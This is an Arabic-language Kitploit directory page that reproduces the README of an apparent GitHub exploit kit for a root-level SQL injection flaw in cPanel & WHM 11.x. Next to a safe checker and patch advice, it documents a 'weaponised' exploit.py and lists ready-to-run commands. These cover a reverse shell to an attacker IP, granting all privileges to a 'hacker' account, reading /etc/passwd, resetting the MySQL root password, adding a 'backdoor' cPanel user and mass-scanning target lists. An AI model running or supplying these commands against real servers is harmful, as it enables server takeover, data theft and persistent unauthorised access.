Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-58048-PoC-Exploit — 👾 CVE-2026-58048 – مجموعة أدوات تنفيذ SQL بصلاحيات الجذر في cPanel (CVSS 9.4) | مجموعة أدوات متكاملة للفريقين الأحمر والأزرق لإصدارات cPanel & WHM 11.x غير المُرقّعة. أداتان: الفاحص الآمن (التدقيق/إعداد التقارير)، والأداة المسلّحة (reverse shell، الاستمرارية، UDF RCE، النشر، قراءة/كتابة الملفات، عمليات قاعدة البيانات، الفحص الشامل). مع Python. 🦾 استخدمها بأخلاقية، والتزم بالقانون <3 | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-58048-poc-exploit
الاستطلاعماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالفريق الأحمرالاستجابة للحوادث

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
أمن قواعد البيانات
GitHubtc4dy/cve-2026-58048-poc-exploit

CVE-2026-58048-PoC-Exploit

عرض المستودع
5219منذ 19س 17دلم تتم المراجعة بعد

حول

👾 CVE-2026-58048 – مجموعة أدوات تنفيذ SQL بصلاحيات الجذر في cPanel (CVSS 9.4) | مجموعة أدوات متكاملة للفريقين الأحمر والأزرق لإصدارات cPanel & WHM 11.x غير المُرقّعة. أداتان: الفاحص الآمن (التدقيق/إعداد التقارير)، والأداة المسلّحة (reverse shell، الاستمرارية، UDF RCE، النشر، قراءة/كتابة الملفات، عمليات قاعدة البيانات، الفحص الشامل). مع Python. 🦾 استخدمها بأخلاقية، والتزم بالقانون <3

مشاركة

CVEPoC

CVE‑2026‑58048 – مجموعة أدوات تنفيذ SQL بصلاحيات الجذر في cPanel

Python 3.8+ CVSS Author cPanel

للاستخدام الأخلاقي فقط – اختبار أمني مصرح به
يوفر هذا المستودع أدوات لمتخصصي الأمن المصرح لهم، والفرق الزرقاء، ومختبري الاختراق فقط.
الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني بموجب CFAA (الولايات المتحدة)، وقانون إساءة استخدام الحاسوب (المملكة المتحدة)، وTCK 243/244 (تركيا)، وقوانين مماثلة في جميع أنحاء العالم.


نظرة عامة على الثغرة

CVE‑2026‑58048 هي ثغرة حقن SQL حرجة في إصدارات cPanel & WHM 11.x تسمح لمستخدم cPanel موثق بتنفيذ أوامر SQL عشوائية بصلاحيات جذر MySQL عبر وظيفة إعادة تسمية قاعدة البيانات.

كيف تعمل

  1. مطلوب وصول موثق – يجب أن يمتلك المهاجم حساب cPanel صالح (اسم مستخدم/كلمة مرور) على الخادم المستهدف.
  2. التلاعب بوضع SQL – يقوم الاستغلال بضبط جلسة MySQL على وضع ANSI_QUOTES، مما يغير سلوك التحليل.
  3. حقن إعادة تسمية قاعدة البيانات – عند إعادة تسمية قاعدة بيانات، لا يتم تعقيم الاسم الجديد بشكل صحيح، مما يسمح للمهاجم بحقن عبارات SQL عشوائية.
  4. صلاحيات الجذر – لأن عملية إعادة التسمية تعمل بصلاحيات جذر MySQL، يتم تنفيذ SQL المحقون بأعلى صلاحيات قاعدة البيانات.
  5. التأثير – استيلاء كامل على قاعدة البيانات، تصعيد الصلاحيات، اختراق الخادم، سرقة البيانات، أبواب خلفية، وحركة جانبية. قم بالترقية فوراً!

الإصدارات المتأثرة

  • cPanel & WHM 11.110 وما قبلها – معرضة للثغرة
  • 11.111 – 11.118 – معرضة للثغرة
  • 11.119 – 11.126 – معرضة للثغرة
  • 11.127 – 11.134 – معرضة للثغرة
  • 11.135 – 11.136 – معرضة للثغرة
  • 11.137.x – معرضة للثغرة قبل 11.137.1.6
  • 11.138.1.6 وما بعدها – مصححة

التصحيح

  • قم بالترقية إلى cPanel & WHM 11.138.1.6 أو أحدث.
  • إذا لم يكن الترقية ممكناً، قم بتعطيل عمليات إعادة تسمية MySQL لمستخدمي cPanel كحل مؤقت.

الأدوات

الأداةالغرضالمستخدم المستهدف
exploit.pyمجموعة أدوات مسلحة كاملة مع reverse shell، استمرارية، UDF RCE، قراءة/كتابة الملفات، عمليات قاعدة البيانات، دعم البروكسي، والمسح الجماعي.الفرق الحمراء / مختبري الاختراق المصرح لهم
safecheck.pyفاحص ثغرات غير تدخلي يكتشف إصدار cPanel ويقيم المخاطر دون تنفيذ أي حمولة خبيثة. ينشئ تقارير مفصلة.الفرق الزرقاء / مدققو الأمن

مقارنة الميزات

الميزةexploit.pysafecheck.py
اكتشاف الثغرة[+][+]
اكتشاف الإصدار[+][+]
حقن SQL بصلاحيات جذر MySQL[+][-]
Reverse shell[+][-]
الاستمرارية (إنشاء مستخدم cPanel)[+][-]
UDF RCE (تنفيذ الأوامر)[+][-]
قراءة/كتابة الملفات[+][-]
عمليات قاعدة البيانات (أي SQL)[+][-]
دعم البروكسي[+][+]
المسح الجماعي (متعدد الخيوط)[+][-]
Shell تفاعلي[+][-]
وضع غير تدخلي (آمن)[-][+]
وضع مفصل/تصحيح[+][+]
التحكم في التحقق من SSL[+][+]
User‑Agent مخصص[+][+]
تأخير الطلبات / إعادة المحاولة[+][-]
إخراج JSON / تقرير[+][+]
فحص إمكانية الوصول إلى نقطة النهاية[-][+]
اكتشاف تسرب وضع SQL[-][+]

ملخص حالات الاستخدام

السيناريوالأداة الموصى بها
الفريق الأزرق – التحقق مما إذا كان تثبيت cPanel الخاص بك معرضاً للثغرةsafecheck.py
التدقيق الأمني – تقييم ثغرات غير تدخليsafecheck.py
الفريق الأحمر – اختبار اختراق مصرح به مع استغلال كاملexploit.py
Bug Bounty – اختبار الإفصاح المسؤولsafecheck.py
المسح الجماعي – فحص أهداف متعددة بحثاً عن الثغرةexploit.py (الكشف فقط)
الاستجابة للحوادث – التحقق مما إذا كانت الأنظمة مخترقةsafecheck.py

التثبيت

git clone https://github.com/tc4dy/CVE-2026-58048-PoC-Exploit
cd CVE-2026-58048
pip install -r requirements.txt

requirements.txt

requests
urllib3
colorama
pymysql

المعاملات

معاملات exploit.py

المعاملالوصف
-t, --targetعنوان URL المستهدف لـ cPanel (مثال: https://cpanel.example.com:2083)
-l, --target-fileملف يحتوي على قائمة الأهداف (واحد في كل سطر) للمسح الجماعي
-u, --mysql-userاسم مستخدم cPanel/MySQL
-P, --mysql-passكلمة مرور cPanel/MySQL
--mysql-portمنفذ MySQL (افتراضي: 3306)
-p, --portتجاوز منفذ cPanel (افتراضي من URL أو 2083)
--threadsعدد الخيوط للأهداف المتعددة (افتراضي: 10)
-o, --outputحفظ النتائج في ملف (هدف واحد)
--logملف سجل للإخراج المفصل
-v, --verboseإخراج مفصل
--proxyبروكسي HTTP/HTTPS (مثال: http://127.0.0.1:8080)
-ua, --user-agentUser‑Agent مخصص
--no-keep-aliveعدم إبقاء الجلسة نشطة
--delayتأخير بين الطلبات (افتراضي: 2.0s)
--max-retriesالحد الأقصى لإعادة المحاولة (افتراضي: 3)
--ssl-verifyالتحقق من شهادات SSL
--cmdالأمر المراد تنفيذه (بادئة sql: أو udf: للتحديد)
--injectSQL مخصص للحقن (يتجاوز الإجراءات الأخرى)
--reverse-shellIP:PORT للـ reverse shell (يستخدم UDF)
--passwdتغيير كلمة مرور جذر MySQL
--adduserإنشاء مستخدم cPanel (USER DOMAIN PASSWORD)
--readقراءة ملف عبر LOAD_FILE
-i, --interactiveShell تفاعلي بعد الاستغلال
--verifyالتحقق من نجاح الاستغلال بمحاولة تسجيل الدخول إلى MySQL
--pingPing الهدف قبل الاستغلال

معاملات safecheck.py

المعاملالوصف
-t, --targetعنوان URL المستهدف لـ cPanel (مثال: https://cpanel.example.com:2083)
-v, --verboseإخراج مفصل
--proxyبروكسي HTTP/HTTPS (مثال: http://127.0.0.1:8080)
-ua, --user-agentUser‑Agent مخصص
--ssl-verifyالتحقق من شهادات SSL
--timeoutمهلة الطلب بالثواني (افتراضي: 10)
--logحفظ التقرير في ملف
--jsonإخراج النتائج بتنسيق JSON

السيناريوهات

#السيناريوالأمر
1فحص سريع للثغرةpython safecheck.py -t https://cpanel.example.com:2083
2فحص مفصل مع تقريرpython safecheck.py -t https://cpanel.example.com:2083 --log report.txt --json -v
3Reverse shellpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4تنفيذ SQL مخصص (جذر)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --inject "GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'pwned'"
5قراءة ملف حساسpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6تغيير كلمة مرور جذر MySQLpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7إنشاء مستخدم cPanel جديد (استمرارية)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8Shell تفاعلي بعد الاستغلالpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9المسح الجماعي من ملفpython exploit.py -l targets.txt -u user -P pass --threads 20 --output results.json
10استخدام بروكسي وUser‑Agent مخصصpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 -ua "Mozilla/5.0 (X11; Linux x86_64)"

استخدام نقاط النهاية وAPI

يستخدم الاستغلال نقاط نهاية cPanel UAPI التالية:

تنزيل الأداة